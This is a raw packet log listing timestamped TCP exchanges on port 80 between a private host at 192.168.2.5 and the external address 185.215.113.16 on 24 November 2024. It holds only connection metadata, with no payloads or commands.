                                                                                                                                                                                                Nov 24, 2024 03:04:31.352612972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.352679014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.352719069 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.353755951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.353809118 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.353867054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.354960918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.355022907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.355047941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.356169939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.356232882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.356271029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.357343912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.357458115 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.357485056 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.358541012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.358587980 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.358644962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.359755993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.359807968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.359834909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.360941887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.360995054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.361042976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.362145901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.362195969 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.362268925 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.363348961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.363447905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.363485098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.364546061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.364590883 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.364655018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.365721941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.365772963 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.365818977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.366931915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.367017984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.367043018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.368110895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.368160963 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.368213892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.369308949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.369373083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.369462967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.370510101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.370589018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.370605946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.371701956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.371769905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.371860027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.372071981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.372920990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.373008013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.373054028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.374084949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.374131918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.374181032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.375304937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.375360966 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.375372887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.392250061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.481235027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.481301069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.481801987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.481852055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.481894970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.482017994 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.483002901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.483108044 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.483149052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.484169006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.518274069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.518295050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.518331051 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.518867970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.518954992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.519000053 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.520036936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.520159006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.520200968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.521214962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.521265984 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.521326065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.522454977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.522528887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.522553921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.523650885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.523694992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.523751020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.524836063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.524882078 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.524939060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.526027918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.526077986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.526158094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.527214050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.527352095 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.527362108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.528405905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.528513908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.528558969 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.529608965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.529736996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.529778957 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.530807018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.530864000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.530919075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.532016039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.532067060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.532109976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.533232927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.533282042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.533334017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.534404993 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.534456968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.534512043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.535588980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.535629034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.535748005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.536791086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.536833048 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.536880970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.538005114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.538096905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.538142920 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.539190054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.539280891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.539324999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.540388107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.540504932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.540555000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.541591883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.541636944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.541671038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.542782068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.542826891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.542870998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.543977976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.544028044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.544078112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.545177937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.545226097 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.545277119 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.546370029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.546415091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.546458006 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.547565937 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.547607899 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.547652960 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.548762083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.548809052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.548856974 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.549972057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.550100088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.550138950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.551146030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.551194906 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.551256895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.552366018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.552407980 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.552467108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.553556919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.553601027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.553637981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.554755926 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.554800034 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.554841995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.555948973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.556005001 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.556025028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.557137012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.557187080 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.557219028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.558306932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.558412075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.558465004 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.559511900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.559624910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.559665918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.560739040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.560801983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.560837030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.561922073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.561976910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.562005997 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.563117981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.563164949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.563219070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.564363003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.564408064 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.564443111 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.565502882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.565550089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.565597057 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.566746950 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.566787004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.566837072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.567878008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.567940950 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.567972898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.568842888 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.569083929 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.569130898 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.569168091 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.570313931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.570359945 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.570382118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.571497917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.571540117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.571594000 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.572701931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.572743893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.572776079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.573873043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.573918104 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.573977947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.575078011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.575124979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.575166941 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.576292992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.576351881 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.576371908 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.576723099 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.682413101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.682499886 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.682673931 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.683007956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.683170080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.683212996 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.684189081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.684298038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.684395075 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.685354948 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.719410896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.719461918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.719521999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.720021963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.720194101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.720238924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.721249104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.721261978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.721297979 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.722435951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.722516060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.722572088 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.723623037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.723680973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.723742962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.724838018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.724931955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.725718975 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.726001978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.726044893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.726106882 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.727214098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.727267027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.727292061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.728404999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.728447914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.728507042 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.729592085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.729645014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.729705095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.730794907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.730890036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.730904102 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.731978893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.732038021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.732085943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.733203888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.733253956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.733304024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.734390020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.734477043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.734523058 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.735573053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.735650063 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.735671043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.736759901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.736803055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.736877918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.738019943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.738068104 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.738074064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.739161968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.739216089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.739243031 CET8049729185.215.113.16192.168.2.5
